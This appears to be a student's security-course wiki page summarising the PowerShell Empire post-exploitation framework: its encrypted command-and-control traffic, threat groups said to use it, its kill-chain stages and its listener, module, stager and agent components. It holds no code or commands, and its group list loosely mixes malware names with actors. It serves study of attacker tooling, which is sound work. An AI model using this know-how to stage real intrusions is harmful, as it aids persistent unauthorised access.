Persistence.md - Juan-bit94/Ops401D10 GitHub Wiki

PowerShell Empire Framework Is No Longer Maintained

Why does this topic matters?

  • This topic matters because understanding offensive security techniques helps IT professionals and organizations better understand the tactics, techniques, and procedures (TTPs) employed by malicious actors. -- This awareness of frameworks such as PS Empire is crucial for developing effective defensive strategies and mitigating cyber threats.

What is one of the major advantages of PowerShell Empire?

  • The major advantage of PowerShell Empire is that it uses encrypted communication with the command and control server, and makes it difficult to detect its traffic in large networks.

What are some of the APT groups that have been known to use PS Empire and into which step of the Cyber Kill Chain does the use of PS Empire fall?

  • There are various APT groups that have been know to use PS Empire, here is a short list
    • Hades
    • FIN7 crime group
    • Trickbot
    • Dridex
  • When PS Empire is in use, the step of the cyber kill chain that PS Empire falls under is the following.
    • Exploitation: PowerShell Empire can be used to exploit vulnerabilities in target systems. It leverages PowerShell scripts to execute commands and run malicious payloads on compromised systems.
    • Command and control (C2): Once a system is compromised, PowerShell Empire provides a command and control infrastructure for the attacker to maintain persistent access and control over the compromised systems.

What are the four main components needed to pull off an attack using PS Empire?

  • The four main components needed for a PS Empire attack are the following.
    1. Listener: This a component of PowerShell Empire that listens for incoming connections from compromised systems. It acts as a command and control (C2) server, allowing the attacker to interact with compromised systems.
    2. Module: This is a collection of scripts that provide specific functionalities for carrying out various tasks during an attack. These tasks can include reconnaissance, privilege escalation, and lateral movement.
    3. Stager: Its an initial stage of the payload that is responsible for establishing communication with the attacker's listener and downloading the full payload onto the compromised system.
    4. Agent: This maintains communication with the attacker's listener. The agent allows the attacker to execute commands, exfiltrate data, and perform various malicious activities on the compromised system.

Things I want to know more about.

  • I would like to know more about the various modules available in the PowerShell Empire Framework, including modules for reconnaissance, exploitation, and persistence.
  • In addition, I would like to learn how to set up and configure listeners in PowerShell Empire to establish command and control (C2) communication with compromised systems.